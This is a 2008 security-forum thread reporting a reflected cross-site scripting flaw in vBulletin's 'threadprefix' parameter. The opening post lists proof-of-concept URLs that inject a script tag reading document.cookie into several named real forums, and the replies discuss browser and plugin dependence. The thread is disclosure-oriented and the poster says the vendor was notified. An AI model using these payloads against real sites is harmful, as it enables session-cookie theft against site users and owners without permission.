Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in multiple VBULLETIN Ver.
Posted by: PaPPy
Date: May 27, 2008 04:17PM

I have confirmed this in multiple Vbulletins
I dont know if its a plugin or if some global PHP setting has to be enabled
but it was vulnerable on vbulletin.org
http://www.xssed.com/mirror/39694/
Version 3.7.1
http://board.jokeroo.com/announcements/?threadprefix="><script>alert(document.cookie);</script>
Unknown version
http://www.mcseboard.de/windows-forum-lan-wan-32/?threadprefix="><script>alert(document.cookie);</script>
Version 3
http://vbmodder.com/forums/f26/?threadprefix="><script>alert(document.cookie);</script>
Version 3.6.4
http://www.netstumbler.org/f55/?threadprefix="><script>alert(document.cookie);</script>
Version 3.6.8
Just to name a view to show the extent of versions vulnerable
I submitted to VB, and they fixed the problem on their site, but havent released anything new.
The only thing i came across to being this: http://www.vbulletin.org/forum/showthread.php?t=123033
and it does have a spot about XSS around the date I told vbulletin.org

But unless it is a something that is now added, because almost every forum I could add ?threadprefix= to the url and it would echo data. That is why I was thinking it was something to do with a php setting

example
http://www.chiefdelphi.com/forums/forumdisplay.php?f=50&threadprefix="><script>alert(document.cookie);</script>
gets escaped out, but it is version 3.6.4

Well let me know what yall think and anything you guys find out



Edited 1 time(s). Last edit at 05/27/2008 04:18PM by PaPPy.

Options: ReplyQuote
Re: XSS in multiple VBULLETIN Ver.
Posted by: moubik
Date: May 30, 2008 10:50AM

Also, to mention, this XSS works only on IE

Options: ReplyQuote
Re: XSS in multiple VBULLETIN Ver.
Posted by: PaPPy
Date: May 30, 2008 02:58PM

hmmm i swear it worked on FF....

Options: ReplyQuote
Re: XSS in multiple VBULLETIN Ver.
Posted by: asilvermtzion
Date: June 25, 2008 05:35PM

Only works on boards with that plugin, which is quite a random one.

Any other recent vulns in vbulletin? Im struggling to find anything

Options: ReplyQuote


Sorry, only registered users may post in this forum.